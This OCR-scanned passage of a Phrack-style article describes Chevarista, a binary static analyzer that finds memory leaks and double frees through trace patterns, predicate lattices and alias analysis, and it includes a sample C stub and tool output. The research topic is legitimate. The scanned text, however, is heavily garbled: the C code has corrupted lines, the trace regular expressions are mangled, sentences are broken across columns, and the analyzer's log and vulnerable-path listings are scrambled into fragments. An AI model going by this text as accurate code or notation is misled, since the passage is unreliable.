help a lot for managing the memory layout of the heap while trying to exploit a heap 


overflow vulnerability. Thus, 


we are also interested in detecting memory 


turns some particular exploits into powerful weapons. 


Using the graphical representation of control flow and data flow, 


find out that the code is wrong: 


Graph analysis of Stub 8 


oA 
| 
| 
O4555> 
| 

fe) 


/ \ \ 


A: Allocation 


R: Return 
REA: Realloc 


F: Free 


R: Return 


Note that this representation is not a data flow graph but a 
control-flow graph annotated with data allocation information for 


the BUF variable. 
paths and sequenc 


This allows us to reason about existing control 
of memory related events. 


Another way of doing 


leak that 


we can easily 


this would have been to reason about data dependences together with 
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the predicates, as done in the first part of this article with the 
Labelled SSI form. We are not dogmatic towards one or another 
intermediate form, and the reader is invited to ponder by himself 
which representation fits better to his understanding. I invite 
you to think twice about the SSI form which is really a condensed 
view of lots of different information. For pedagogical purpose, we 
switch here to a more intuitive intermediate form that express a 
Similar class of problems. 


0. #define PACKET_HEADER_SIZE 20 


Ts, “ante off = 0; 


TY 
2. u_int ret = 10; 
3. char *buf = malloc(ret); M 
4. do { 
5 off += read(sock, buf + off, ret - off); 
6. if (off <= 0) 
Ves return (-ERR); R 
8 else if (ret == off) 
Oe buf = realloc(buf, (ret = ret * 2)); REA 
10.} while (off != PACKET _HEADER_SIZE); 
11. printf ("Received %s \n", buf); 
12. free (buf); F 
13. return; R 


Using simple DFS (Depth-First Search) over the graph representing Stub 8, 
we are capable of extracting sequences lik 


1,2, (3 M),4,5,6,8,10,11, (12 F), (12 R) Mis ee Beast —-noleak-— 
1,2, (3 M),4, (5,6,8,10)*,11, (12 F), (12 R) M(...)*F...R —-noleak- 
1,2, (3 M),4,5,6,8,10,5,6, (7 R) M...R -leak- 
1,2, (3 M), (4,5,6,8,10)*,5,6, (7 R) Mine ) AR -leak- 
1,2, (3 M),4,5,6,8, (9 REA),10,5,6, (7 R) M...REA...R -leak- 
1,2, (3 M),4,5,6, (7 R) M...R -leak- 
etc 


More generally, we can represent the set of all possible traces for 
this example 


1,2,3, (5,6, (7 | 8(9 | Nop)) 10)*, (11,12,13)* 


with | meaning choice and * meaning potential looping over the events 
placed between (). As the program might loop more than once or twice, 

a lot of different traces are potentially vulnerable to the memory leak 
not only the few we have given), but all can be expressed using this 
global generic regular expression over events of the loop, with respect 
to this regular expression: 


ma 


-*(M) [°F] * (R) 
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that represent traces containing a malloc followed by a return without 
an intermediate free, which corresponds in our program to: 


»* (3) [°121 * (7) 
= £03) 544) # because 12 is not between 3 and 7 in any cycle 
In other words, if we can extract a trace that leads to a return after passing 


by an allocation not followed by a free (with an undetermined number of states 
between those 2 steps), we found a memory leak bug. 


We can then compute the intersection of the global regular expression trace 
and the vulnerable traces regular expression to extract all potential 
vulnerable path from a language of traces. In practice, we will not generate 
all vulnerable traces but simply emit a few of them, until we find one that 
we can indeed trigger. 


Clearly, the first two trace have a void intersection (they dont contain 7). So 
those traces are not vulnerable. However, the next traces expressions match 
the pattern, thus are potential vulnerable paths for this vulnerability. 


We could use the exact same system for detecting double free, except that 
our trace pattern would be 


-*(F) [A] * (F) 


that is : a free followed by a second free on the same dataflow, not passing 

through an allocation between those. A simple trace-based analyzer can detect 

many cases of vulnerabilities using a single engine ! That superclass of 
vulnerability is made of so called type-state vulnerabilities, following the idea that 
if the type of a variable does not change during the program, its state does, 

thus the standard type checking approach is not sufficient to detect this kind of 
vulnerabilities. 


As the careful reader might have noticed, this algorithm does not take predicates 
in account, which means that if such a vulnerable trace is emitted, we have no 
garantee if the real conditions of the program will ever execute it. Indeed, we 
might extract a path of the program that "cross" on multiple predicates, some 
being incompatible with others, thus generating infeasible paths using our 
technique. 


For example in our Stub 8 translated to assembly code, a predicate-insensitive 
analysis might generate the trac 


12:37 4497 0787-97 10;,11,12,13 


which is impossible to execute because predicates holding at states 8 and 10 
cannot be respectively true and false after just one iteration of the loop. Thus 
such a trace cannot exist in the real world. 


We will not go further this topic for this article, but in the next part, we will 
discuss various improvements of what should be a good analysis engine to avoid 
generating too much false positives. 


oie ae aaa ete as [ C. How to improve 


In this part, we will review various methods quickly to determine how exactly 
it is possible to make the analysis more accurate and efficient. Current researchers 
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in program analysis used to call this a "counter-example guided" verification. Various 
techniques taken from the world of Model Checking or Abstract Interpretation can then 
be used, but we will not enter such theoretical concerns. Simply, we will discuss the 


ideas of those techniques without entering details. The proposed chevarista analyzer 


in appendix of this article only perform basic alias analysis, no predicate analysis, 
and no thread scheduling analysis (as would be useful for detecting race conditions). 


I will give the name of few analyzer that implement this analysis and quote which 
techniques they are using. 


[ a. Predicate analysis and the predicate lattice 


Predicate abstraction [PA] is about collecting all the predicates in a program, and 
constructing a mathematic object from this list called a lattice [LAT]. A lattice is 
a set of objects on which a certain (partial) order is defined between elements 

of this set. A lattice has various theoretical properties that makes it different 
than a partial order, but we will not give such details in this article. We will 
discuss about the order itself and the types of objects we are talking about: 


-— The order can be defined as the union of objects 


(P < Q iif P is included in Q) 


— The objects can be predicates 


- The conjunction (AND) of predicate can be the least upper bound of N 
predicates. Predicates (a > 42) and (b < 2) have as upper bound: 


(a > 42) && (b < 2) 


- The disjunction (OR) of predicates can be the greatest lower bound of 
N predicates. Predicates (a > 42) and (b < 2) would have as lower 
bound: 


(a > 42) || (b < 2) 


So the lattice would look like: 


/ \ 
/ \ 
/ \ 
(a > 42) (b < 2) 
\ / 
\ / 
\ / 
(a > 42) || (b < 2) 


Now imagine we have a program that have N predicates. If all predicates 
can be true at the same time, the number of combinations between predicates 


will be 2 at the power of N. THis is without counting the lattice elements 
which are disjunctions between predicates. The total number of combinations 
will then be then 2*2pow(N) - N : We have to substract N because the predicates 


made of a single atomic predicates are shared between the set of conjunctives 
and the set of disjunctive predicates, which both have 2pow(N) number of 
elements including the atomic predicates, which is the base case for a conjunction 


(pred && true) or a disjunction (pred || false). 

We may also need to consider the other values of predicates : false, and unknown. 
False would simply be the negation of a predicate, and unknown would inform about 
the unknown truth value for a predicat (either false or true, but we dont know). 


In that case, the number of possible combinations between predicates is to count 
on the number of possible combinations of N predicates, each of them being potential] 


LY. 


true, false, or unknown. That makes up to 3pow(N) possibilities. This approach is cal 


lled 
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three-valued logic [TVLA]. 


In other words, we have a exponential worse case space complexity for constructing 
the lattice of predicates that correspond to an analyzed program. Very often, the 
lattice will be smaller, as many predicates cannot be true at the same time. However, 
there is a big limitation in such a lattice: it is not capable to analyze predicates 
t 
m 
W 


hat mix AND and OR. It means that if we analyze a program that can be reached using 
any different set of predicates (say, by executing many different possible paths, 

hich is the case for reusable functions), this lattice will not be capable to give 

the most precise "full" abstract representation for it, as it may introduce some 
flow-insensitivity in the analysis (e.g. a single predicate combinations will represent 
multiple different paths). As this might generate false positives, it looks like a good 
trade-off between precision and complexity. Of course, this lattice is just provided as 
an example and the reader should feel free to adapt it to its precise needs and depending 
on the size of the code to be verified. It is a good hint for a given abstraction 

but we will see that other information than predicates are important for program 
analysis. 


[ b. Alias analysis is hard 


A problem that arises in both source code but even more in binary code 
automated auditing is the alias analysis between pointers. When do pointers 
points on the same variables ? This is important in order to propagate the 
infered allocation size (when talking about a buffer), and to share a 
type-state (such as when a pointer is freed or allocated : you could miss 
double free or double-something bugs if you dont know that 2 variables are 
actually the same). 


There are multiple techniques to achieve alias analysis. Some of them works 
inside a single function (so-called intraprocedural [DDA]). Other works across 
the boundaries of a function. Generally, the more precise is your alias 
analysis, the smaller program you will be capable to analyze. It seems 

quite difficult to scale to millions of lines of code if tracking every 
single location for all possible pointers in a naive way. In addition 

to the problem that each variable might have a very big amount of aliases 
(especially when involving aliases over arrays), a program translated to 

a single-assignment or single-information form has a very big amount of 
variables too. However the live range of those variables is very limited, 

so their number of aliases too. It is necessary to define aliasing relations 
between variables so that we can proceed our analysis using some extra checks: 


— no_alias (a,b) : Pointers a and b definitely points on different sets 
of variables 


— must_alias(a,b) : Pointers a and b definitely points on the same set 
of variables 


— may_alias (a,b) : The "point-to" sets for variables a and b share some 
elements (non-null intersection) but are not equal. 


NoAliasing and MustAliasing are quite intuitive. The big job is definitely 
the MayAliasing. For instance, 2 pointers might point on the same variable 
when executing some program path, but on different variables when executing 

from another path. An analysis that is capable to make those differences is 

called a path-sensitive analysis. Also, for a single program location manipulating 
a given variable, the point-to set of the variable can be different depending 

on the context (for example : the set of predicates that are true at this moment 
of abstract program interpretation). An analysis that can reason on those 
differences is called context-sensitive. 


Its an open problem in research to find better alias analysis algorithms that scale 
to big programs (e.g. few computation cost) and that are capable to keep 
sufficiently precision to prove security properties. Generally, you can have one, 
but not the other. Some analysis are very precise but only works in the boundaries 
of a function. Others work in a pure flow-insensitive manner, thus scale to big 
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programs but are very imprecise. My example analyzer Chevarista implements only 

a simple alias analysis, that is very precise but does not scale well to big 
programs. For each pointer, it will try to compute its point-to set in the concrete 
world by somewhat simulating the computation of pointer arithmetics and looking at 
its results from within the analyzer. It is just provided as an example but is 

in no way a definitive answer to this problem. 


[ c. Hints on detecting race conditions 


Another class of vulnerability that we are interested to detect 
automatically are race conditions. Those vulnerability requires a different 
analysis to be discovered, as they relates to a scheduling property : is 
it possible that 2 thread get interleaved (a,b,a,b) executions over their 
critical sections where they share some variables ? If the variables are 
all well locked, interleaved execution wont be a problem anyway. But if 
locking is badly handled (as it can happens in very big programs such 
as Operating Systems), then a scheduling analysis might uncover the 
problem. 


Which data structure can we use to perform such analysis ? The approach 

of JavaPathFinder [JPF] that is developed at NASA is to use a scheduling graph. 
The scheduling graph is a non-cyclic (without loop) graph, where nodes 
represents states of the program and and edges represents scheduling 

events that preempt the execution of one thread for executing another. 


As this approach seems interesting to detect any potential scheduling 
path (using again a Depth First Search over the scheduling graph) that 
fails to lock properly a variable that is used in multiple different 
threads, it seems to be more delicate to apply it when we deal with 
more than 2 threads. Each potential node will have as much edges as 
there are threads, thus the scheduling graph will grow exponentially 
at each scheduling step. We could use a technique called partial 
order reduction to represent by a single node a big piece of code 

for which all instructions share the same scheduling property (like: 
it cannot be interrupted) or a same dataflow property (like: it uses 
the same set of variables) thus reducing the scheduling graph to make 
it more abstract. 


Again, the chevarista analyzer does not deal with race conditions, but 
other analyzers do and techniques exist to make it possible. Consider 
reading the references for more about this topic. 


oe aaa [ IV. Chevarista: an analyzer of binary programs 


Chevarista is a project for analyzing binary code. In this article, most of 
th xamples have been given in C or assembly, but Chevarista only analyze 
the binary code without any information from the source. Everything it 
needs is an entry point to start the analysis, which you can always get 
without troubles, for any (working ? ;) binary format like ELF, PE, etc. 


Chevarista is a simplier analyzer than everything that was presented in 

this article, however it aims at following this model, driven by the succesful 
results that were obtained using the current tool. In particular, the 
intermediate form of Chevarista at the moment is a graph that contains 

both data-flow and control-flow information, but with sigma and phi 

functions let implicit. 


For simplicity, we have chosen to work on SPARC [SRM] binary code, but after 
reading that article, you might understand that the representations 

used are sufficiently abstract to be used on any architecture. One could 
argue that SPARC instruction set is RISC, and supporting CISC architecture 
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like INTEL or ARM where most of the instruction are conditional, would be 

a problem. You are right to object on this becaus these architectures 
requires specific features of the architecture-dependant backend of 

the decompiler-analyzer. Currently, only the SPARc backend is coded and there 
is an empty skeleton for the INTEL architecture [IRM]. 


What are, in the detail, the difference between such architectures ? 


They are essentially grouped into a single architecture-dependant component 


The Backend 


On INTEL 32bits processors, each instruction can perform multiple operations. 

It is also the case for SPARC, but only when conditional flags are affected 

by the result of the operation executed by the instruction. For instance, 

a push instruction write in memory, modify the stack pointer, and potentially 
modify the status flags (eflags register on INTEL), which make it very hard to 
analyze. Many instructions do more than a single operation, thus we need to 
translate into intermediate forms that make those operations more explicit. If 
we limit the number of syntactic constructs in that intermediate form, we are 
capable of performing architecture independant analysis much easier with 

all operations made explicit. The low-level intermediate form of Chevarista 

has around 10 "abstract operations" in its IR : Branch, Call, Ternop (that 

has an additional field in the structure indicating which arithmetic or 

logic operation is performed), Cmp, Ret, Test, Interrupt, and Stop. Additionally 
you have purely abstract operations (FMI: Flag Modifying Instruction), CFI 
(Control Flow Instruction), and Invoke (external functions calls) which allow to 
make the analysis further even more generic. Invoke is a kind of statement that 
inform the analyzer that it should not try to analyze inside the function being 
invoked, but consider those internals as an abstraction. For instance, types 
Alloc, Free, Close are child classes of the Invoke abstract class, which model 
the fact that malloc(), free(), or close() are called and the analyzer should 
not try to handle the called code, but consider it as a blackbox. Indeed, finding 
allocation bugs does not require to go analyzing inside malloc() or free(). This 
would be necessary for automated exploit generation tho, but we do not cover this 
here. 


We make use the Visitor Design Pattern for architecturing the analysis, as presented 


in the following paragraph. 


[ B. Program transformation & modeling 


The project is organized using the Visitor Design Pattern [DP]. To sum-up, 
the Visitor Design Pattern allows to walk on a graph (that is: the intermediat 
form representation inside the analyzer) and transform the nodes (that contains 
either basic blocs for control flow analysis, or operands for dataflow analysis: 
indeed the control or data flow links in the graph represents the ancestors / 
successors relations between (control flow) blocs or (data flow) variables. 


The project is furnished as it: 


visitor: The default visitor. When the graph contains node which 
type are not handled by the current visitor, its this visitor that 
perform the operation. THe default visitor is the root class of 
the Visitor classes hierarchy. 


arch : the architecture backend. Currently SPARC32/64 is fully 
provided and the INTEL backend is just a skeleton. The 
whole proof of concept was written on SPARC for simplicity. This 
part also includes the generic code for dataflow and control flow 
computations. 
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graph : It contains all the API for constructing graphs directly into 
into the intermediate language. It also defines all the abstract 
instructions (and the "more" abstract instruction as presented 
previously) 


gate : This is the interprocedural analysis visitor. Dataflow and 
Control flow links are propagated interprocedurally in that visitor. 
Additionally, a new type "Continuation" abstracts different kind of 
control transfer (Branch, Call, Ret, etc) which make the analysis even 
easier to perform after this transformation. 


alias : Perform a basic point-to analysis to determine obvious aliases 
between variables before checking for vulnerabilities. THis analysis is 
exact and thus does not scale to big programs. There are many hours of 
good reading and hacking to improve this visitor that would make the whole 
analyzer much more interesting in practice on big programs. 


heap : This visitor does not perform a real transformation, but simplistic graph 
walking to detect anomalies on the data flow graph. Double frees, Memory 
leaks, and such, are implemented in that Visitor. 

print : The Print Visitor, simply prints the intermediate forms after each 
transformation in a text file. 

printdot : Print in a visual manner (dot/graphviz) the internal representation. This 


can also be called after each transformation but we currently calls it 
just at this end of the analysis. 


Additionally, another transformation have been started but is still work in progress: 


symbolic : Perform translation towards a more symbolic intermediate forms (such as 
SSA and SSI) and (fails to) structure the control flow graphs into a graph 
of zones. This visitor is work in progress but it is made part of this 
release as Chevarista will be discontinued in its current work, for being 
implemented in the ERESI [RSI] language instead of Ctt. 


| | | | 
| Architecture | | | 
----> | | —> | | -—> Results 
| Backend | | | 
| | | | 


[ C. Vulnerability checking 


Chevarista is used as follow in this demo framework. A certain big testsuits of binary 
files is provided in the package and the analysis is performed. In only a couple of 
seconds, all the analysis is finished: 


# W xecute chevarista on testsuite binary 34 
S autonomous/chevarista ../testsuite/34.elf 


:/\ Chevarista standalone version /\:. 
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Detected SPARC 


24 


Chevarista IS STARTING 

Calling sparc64_IDG 

Created IDG 

SPARC IDG New bloc at addr 0000000000100A34 
SPARC IDG New bloc at addr 00000000002010A0 
[!] Reached Invoke at addr 00000000002010A4 
SPARC IDG New bloc at addr 0000000000100A44 
Cflow reference to 00100A50 

Cflow reference from 00100A48 

Cflow reference from 00100C20 

SPARC IDG New bloc at addr OO0OQ00000000100A4C 
SPARC IDG New bloc at addr 0000000000100A58 
SPARC IDG New bloc at addr 0000000000201080 
[!] Reached Invoke at addr 0000000000201084 
SPARC IDG : New bloc at addr 0000000000100A80 
SPARC IDG New bloc at addr 0000000000100AA4 
SPARC IDG New bloc at addr 0000000000100AD0 
SPARC IDG New bloc at addr QO0OQ0Q0000000100AF4 
SPARC IDG New bloc at addr 0000000000100B10 
SPARC IDG New bloc at addr 0000000000100B70 
SPARC IDG New bloc at addr 0000000000100954 
Cflow reference to : 00100970 

Cflow reference from 00100968 

Cflow reference from OO1O0A1C 

SPARC IDG New bloc at addr 000000000010096C 
SPARC IDG New bloc at addr 0000000000100A24 
Cflow reference to : QO1O0A2C 

Cflow reference from O00100A24 

Cflow reference from 00100A08 

SPARC IDG : New bloc at addr 0000000000100A28 
SPARC IDG New bloc at addr 0000000000100980 
SPARC IDG New bloc at addr 0000000000100A10 
SPARC IDG New bloc at addr 00000000001009C4 
SPARC IDG New bloc at addr 0000000000100B88 
SPARC IDG New bloc at addr 0000000000100BA8 
SPARC IDG New bloc at addr 0000000000100BCO 
SPARC IDG New bloc at addr 0000000000100BE0 
SPARC IDG : New bloc at addr O000000000100BF8 
SPARC IDG : New bloc at addr 0000000000100C14 
SPARC IDG : New bloc at addr 00000000002010C0 
[!] Reached Invoke at addr 00000000002010C4 
SPARC IDG : New bloc at addr 0000000000100C20 
SPARC IDG New bloc at addr 0000000000100C04 
SPARC IDG New bloc at addr 0000000000100910 
SPARC IDG New bloc at addr 0000000000201100 
[!] Reached Invoke at addr 0000000000201104 
SPARC IDG New bloc at addr 0000000000100928 
SPARC IDG New bloc at addr 000000000010093C 
SPARC IDG New bloc at addr 0000000000100BCC 
SPARC IDG New bloc at addr 00000000001008E0 
SPARC IDG New bloc at addr OQO0O000000001008F4 
SPARC IDG New bloc at addr 0000000000100900 
SPARC IDG New bloc at addr 0000000000100BD8 
SPARC IDG New bloc at addr 0000000000100B94 
SPARC IDG New bloc at addr 00000000001008BC 
SPARC IDG New bloc at addr 00000000001008D0 
SPARC IDG New bloc at addr 0000000000100BA0 
SPARC IDG New bloc at addr 0000000000100B34 
SPARC IDG New bloc at addr 0000000000100B58 
Cflow reference to : 00100B74 

Cflow reference from O0O0100B6C 

Cflow reference from 00100B2C 

Cflow reference from 00100B50 

SPARC IDG New bloc at addr 0000000000100B04 
SPARC IDG New bloc at addr 00000000002010E0 
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loc at addr QOO0O0Q0000000100AE 
loc at addr 0000000000100A98 
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Intraprocedural Dependance Graph has been built succesfully! 
A number of 47 blocs has been statically traced for flow-types 


[+] IDG built 
Scalar parameter REPLACED with name 
Backward dataflow analysis VAR 
Scalar parameter REPLACED with name 
Backward dataflow analysis VAR 
Scalar parameter REPLACED with name 
Backward dataflow analysis VAR 
Backward dataflow analysis VAR 
Return-Value REPLACED with name = %i 
Backward dataflow analysis VAR 
Backward dataflow analysis VAR 
Return-Value REPLACED with name = %i 
Backward dataflow analysis VAR 
Backward dataflow analysis VAR [%fp 
Scalar parameter REPLACED with name 
Backward dataflow analysis VAR 
Scalar parameter REPLACED with name 
Backward dataflow analysis VAR 
Scalar parameter REPLACED with name 
Backward dataflow analysis VAR 
Scalar parameter REPLACED with name 
Backward dataflow analysis VAR 
Scalar parameter REPLACED with name 
Backward dataflow analysis VAR 
Scalar parameter REPLACED with name 
Backward dataflow analysis VAR 
Backward dataflow analysis VAR 
Return-Value REPLACED with name = $i 
Backward dataflow analysis VAR 
Backward dataflow analysis VAR [%fp 
Backward dataflow analysis VAR [%fp 
Backward dataflow analysis VAR [%fp 
Backward dataflow analysis VAR 
Return-Value REPLACED with name = $i 
Backward dataflow analysis VAR 
Backward dataflow analysis VAR [%fp 
Backward dataflow analysis VAR [%fp 
Backward dataflow analysis VAR [%fp 
Backward dataflow analysis VAR [%fp 
Backward dataflow analysis VAR [%fp 
Backward dataflow analysis VAR [%fp 
Backward dataflow analysis VAR [%fp 
Backward dataflow analysis VAR 
Backward dataflow analysis VAR 
Backward dataflow analysis VAR 
Scalar parameter REPLACED with name 
Backward dataflow analysis VAR 
Scalar parameter REPLACED with name 
[ist Susel 
Backward dataflow analysis VAR 
Backward dataflow analysis VAR [%fp 
Backward dataflow analysis VAR [%fp 
+] GateVisitor finished 
+] AliasVisitor finished 
Entered Node Splitting for Node id 
Entered Node Splitting for Node id 
Entered Node Splitting for Node id 
Entered Node Splitting for Node id 
Entered Node Splitting for Node id 
Entered Node Splitting for Node id 
Entered Node Splitting for Node id 


500 
$00, 
500 
$00, 
500 
00, 
Sfp, 


(addr= 


$i0, 


Sfp, 


(addr= 


Si0, 
J7e7] 
500 
00, 
500 
S00, 
Sol 
Sol, 
Sol 
Sol, 
502 
S02, 
SO2 
S02, 
sfp, 


(addr= 


i 


nstr 


(addr= 


i 


nstr 


(addr= 


, 


1 
aly 


a: 
1 


i 


nstr 
nstr 
0000 


0000 


(addr= 


i 


nstr 


(addr= 


i 


nstr 


(addr= 


i 


nstr 


(addr= 


i 


nstr 


(addr= 


i 


nstr 


(addr= 


i 
1 


(addr= 


%i0, 
703] 
Td£f] 
Te7] 
Sfp, 


%i0, 
703 
703 
Tdf 
Jel 
Jel 
Jel 
Jel 
Sfp, 
Sfp, 
Sfp, 
500 


sfp, 
7df] 
Te7] 


24 
194 
722 
7194 
1514 
1536 
1642 


i 


, 


y 


, 


Ty 


Ty 


Ty 


Ty 


i 


i 


nstr 
nstr 
0000 


00000000002010A4) 
addr 000000000020 
00000000002010A4) 
addr 000000000020 
00000000002010A4) 
addr 000000000020 
addr 000000000010 
000000100A44) 


nstr addr 0000000000100A44 
nstr addr O0OQ0Q000000100A5C 


000000100A58) 


0000000000201084 
addr 00000000002 
0000000000201084 
addr 00000000002 
0000000000201084 
addr 00000000002 
0000000000201084 
addr 00000000002 
0000000000201084 
addr 00000000002 
0000000000201084 


SO i, EP a, SO a ED a Dt 


) 


addr 0000000000201 


addr 000000000010 
000000100A80) 


10A4 


10A4 


10A4 
OA48 


nstr addr 0000000000100A58 
instr addr 0000000000100A6C 


1084 


1084 


1084 


1084 


1084 


084 
OA84 


nstr addr 0000000000100A80 


instr addr 0000000000100AA4 
instr addr 0000000000100ABC 
instr addr 0000000000100AAC 
instr addr 0000000000100AD4 

(addr= 0000000000100AD0) 
instr addr 0000000000100AD0 


instr 
instr 
instr 


nstr 


addr 
addr 
addr 
addr 
addr 


00000000001 
00000000001 
00000000001 
00000000001 
00000000001 
addr 00000000001 
addr 00000000001 
addr 000000000010 
addr 000000000010 
addr 000000000010 
0000000000100958) 
addr 000000000010 
0000000000100958) 


addr 000000000010 


OOAF4 
00B24 
00B18 
00B70 
00B70 
00B70 
00B38 
0964 

0964 

0964 


0958 


OB6C 


instr addr 0000000000100B60 
instr addr 0000000000100B58 
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+] SymbolicVisitor finished 


Entering DotVisitor 

+ SESE visited 

+ SESE visited 

SESE already visited 

SESE already visited 

SESE visited 

SESE visited 

* SESE already visited 

* SESE already visited 

eS 

! N 
‘S) 
S 
iS) 
S 
] 


ESE already visited 

ode pointed by (nil) is NOT a SESE 
ESE visited 

ESE already visited 

ESE already visited 

ESE already visited 

Print*Visitors finished 


+ 


Starting HeapVisitor 
Double Free found 

Double Free found 

Double malloc 

[+] Heap visitor finished 


[+] Chevarista has finished 


The run was performed in less than 2 seconds and multiple vulnerabilities have 
been found in the binary file (2 double free and one memory leak as indicated 
by the latest output). Its pretty useless without more information, which brings 


us to the results. 


[ D. Vulnerable paths extraction 


Once the analysis has been performed, we can simply check what the vulnerable 


paths were: 
~/IDA/sdk/plugins/chevarista/sre $ ls tmp/ 
cflow.png chevarista.alias chevarista.buchi chevarista.dflow.dot \ 


chevarista.dot chevarista.gate chevarista.heap chevarista.lir \ 
chevarista.symbolic dflow.png 


Each visitor (transformation) outputs the complete program in each intermediate 


form. The most interesting thing is the output of the heap visitor that give 


us exactly the vulnerable paths: 
~/IDA/sdk/plugins/chevarista/sre $ cat tmp/chevarista.heap 


[%fp + 7e7] 


[$fp + 7df] 
[$10] 


KKK KKK KKK KK KKK KKK KKK KKK KKK KKK KK KK KK 
* * 
* Multiple free of same variables * 
* * 


KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK 
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path to free 1 


KKKKKKKKKKKKKKKKKK 
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@O0x2010a4 (0) {S} 32: inparam_%i0 = Alloc(inparam_%i0) 
@O0x100a44 (4) {S} 46: %Sgl1 = outparam_%o0 

@0x100a48 (8) {S} 60: local_%fp$Ox7e7 = %g1 

@0x1l00bcc (8) {S} 1770: outparam_%o0 = local_%fp$0x7Je7 
@0x1008e4 (8) {S} 1792: local_%SfpS0x87f = inparam_%i0 
@Ox1l008f4 (8) {S} 1828: outparam_%o0 = local_%SfpSO0x87f 
@0x2010c4 (0) {S} 1544: inparam_%i0 = Free (inparam_%i0) 
KKKKKKKKKKKKKKKKKK 

path to free 2 

KKKKKKKKKKKKKKKKKK 

@O0x2010a4 (0) {S} 32: inparam_%i0 = Alloc(inparam_%i0) 
@0x100a44 (4) {S} 46: %Sgl1 = outparam_%o0 

@0x100a48 (8) {S} 60: local_%fp$Ox7e7 = %g1 

@O0x100b58 (8) {S} 2090: Sgl = local_%SfpS0x7e7 
@Oxl00b5c (8) {S} 2104: local_*fp$0x7d7 = Sgl1 

@Ox1l00b68 (8) {S} 2146: sgl = local_%fp$0Ox7d7 
@O0x1l00b6c (8) {S} 2160: local_SfpSOx7df = Sg1 

@0x100c14 (8) {S} 1524: outparam_%o0 = local_%SfpSOx7df 
@O0x2010c4 (0) S} 1544: inparam_%Si0 = Free (inparam_%i0) 
KKKKKKKKKKKKKKKKKK 

path to free 3 

KKKKKKKKKKKKKKKKKK 

@0x2010a4 (0) {S} 32: inparam_%i0 = Alloc(inparam_%i0) 
@O0x100a58 (4) {S} 96: %gl = outparam_%o0 

@O0x100a5c (8) {S} 110: local_SfpSO0Ox7df = %Sg1 

@0x100c14 (8) {S} 1524: outparam_%o0 = local_%SfpSOx7df 
@0x2010c4 (0) {S} 1544: inparam_%i0 = Free(inparam_%i0) 
KKKKKKKKKKKKKKKKKK 

path to free 4 

KKKKKKKKKKKKKKKKKK 

@O0x2010a4 (0) S} 32: inparam_%i0 = Alloc(inparam_%i0) 
@O0x100a58 (4) {S} 96: %gl = outparam_%o0 

@0x100a5c (8) {S} 110: local_SfpSO0Ox7df = %Sg1 

@Ox1l00b60 (8) {S} 2118: sgl = local_%fp$0Ox7df 
@Ox1l00b64 (8) {S} 2132: local_SfpSO0x7e7 = %Sg1 
@Oxl00bce (8) {S} 1770: outparam_ $00 = local_%fp$0x7Je7 
@0x1008e4 (8) {S} 1792: local_%SfpS0x87f = inparam_%i0 
@Ox1l008f4 (8) {S} 1828: outparam_%o0 = local_%SfpSO0x87f 
@O0x2010c4 (0) S} 1544: inparam_%Si0 = Free (inparam_%i0) 


~/IDA/sdk/plugins/chevarista/sre $ 


As you can see, we now have the com 


plete vulnerable paths where multi 


frees are done in sequence over th 
double frees were found and one mem 
is not given, since there is no (it 


A very useful trick was also to giv 


same variables. In this example, 
ory leak, for which the path to fr 
Ss a memory leak :). 


more refined types to operands. 


instance, local variables can be id 


accessed throught the stack pointer. 


can also be found easily by inspect 
(for the SPARC architecture only). 


a 
al 


Future work 


ntified pretty easily if they are 
Function parameters and results 
ing the use of %i and %o registers 


Refinement 
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2 
ee 
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The final step of the analysis is refinement [CEGF]. Once you have analyzed 
a program for vulnerabilities and we have extracted the path of the program 

that looks like leading to a corruption, we need to recreate the real conditions 
of triggering the bug in the reality, and not in an abstract description of the 
program, as we did in that article. For this, we need to execute for real (this 
time) the program, and try to feed it with data that are deduced from the 
conditional predicates that are on the abstract path of the program that leads to 
the potential vulnerability. The input values that we would give to the program 
must pass all the tests that are on the way of reaching the bug in the real world. 


Not a lot of projects use this technique. It is quite recent research to determine 
exactly how to be the most precise and still scaling to very big programs. The 
answer is that the precision can be requested on demand, using an iterative procedur 
as done in the BLAST [BMC] model checker. Even advanced abstract interpretation 
framework [ASA] do not have refinement in their framework yet : some would argue 

its too computationally expensive to refine abstractions and its better to couple 
weaker abstractions together than tring to refine a single "perfect" one. 


ion 


al 


ly 


[ V. Related Work 


Almost no project about this topic has been initiated by the underground. The 

work of Nergal on finding integer overflow into Win32 binaries is the first 

notable attempt to mix research knowledge and revers ngineering knowledge, 

using a decompiler and a model checker. The work from Halvar Flake in the framework 


of BinDiff/BinNavi [BN] is interesting but serves until now a different purpose tha 


finding vulnerabilities in binary code. 


On a more theoretical point of view, the interested reader is invited to look 
at the reference for findings a lot of major readings in the field of program 
analysis. Automated revers ngineering, or decompiling, has been studied in 
the last 10 years only and the gap is still not completely filled between those 
2 worlds. This article tried to go into that direction by introducing formal 
techniques using a completely informal view. 


Mostly 2 different theories can be studied : Model Checking [MC] and Abstract 
Interpretation [AI] . Model Checking generally involves temporal logic properties 
expressed in languages such as LTL, CTL, or CTL* or [TL]. Those properties are then 
translated to automata. Traces are then used as words and having the automata 

not recognizing a given trace will mean breaking a property. In practice, the 


formula is negated, so that the resulting automata will only recognize the trace 
leading to vulnerabilities, which sounds a more natural approach for detecting 
vulnerabilities. 


Abstract interpretation [ASA] is about finding the most adequate system representat 


for allowing the checking to be computable in a reasonable time (else we might 
end up doing an "exhaustive bruteforce checking" if we try to check all the potenti 


behavior of the program, which can btw be infinite). By reasoning into an abstract 
domain, we make the state-space to be finite (or at least reduced, compared to the 
real state space) which turn our analysis to be tractable. The strongest the 
abstractions are, the fastest and imprecise our analysis will be. All the job 
consist in finding the best (when possible) or an approximative abstraction that 
is precise enough and strong enough to give results in seconds or minuts. 


In this article, we have presented some abstractions without quoting them explicite 


(interval abstraction, trace abstraction, predicate abstraction ..). You can also 
design product domains, where multiple abstractions are considered at the same time 
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which gives the best results, but for which automated procedures requires more work 
to be defined. 


SSeS [ VI. Conclusion 


I Hope to have encouraged the underground community to think about using more 
formal techniques for the discovery of bugs in programs. I do not include this 
dream automated tool, but a simplier one that shows this approach as rewarding, 
and I look forward seing more automated tools from the revers ngineering 
community in the future. The chevarista analyzer will not be continued as it, 
but is being reimplemented into a different analysis environment, on top of a 
dedicated language for revers ngineering and decompilation of machine code. 
Feel free to hack inside the code, you dont have to send me patches as I do not 
use this tool anymore for my own vulnerability auditing. I do not wish to encourage 
script kiddies into using such tools, as they will not know how to exploit the 
results anyway (no, this does not give you a root shell). 


Sera! [ VII. Greetings 


Why should every single Phrack article have greetings ? 


The persons who enjoyed Chevarista know who they are. 
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http://eresi.asgardlabs.org 


PA] Automatic Predicate Abstraction of C Programs 
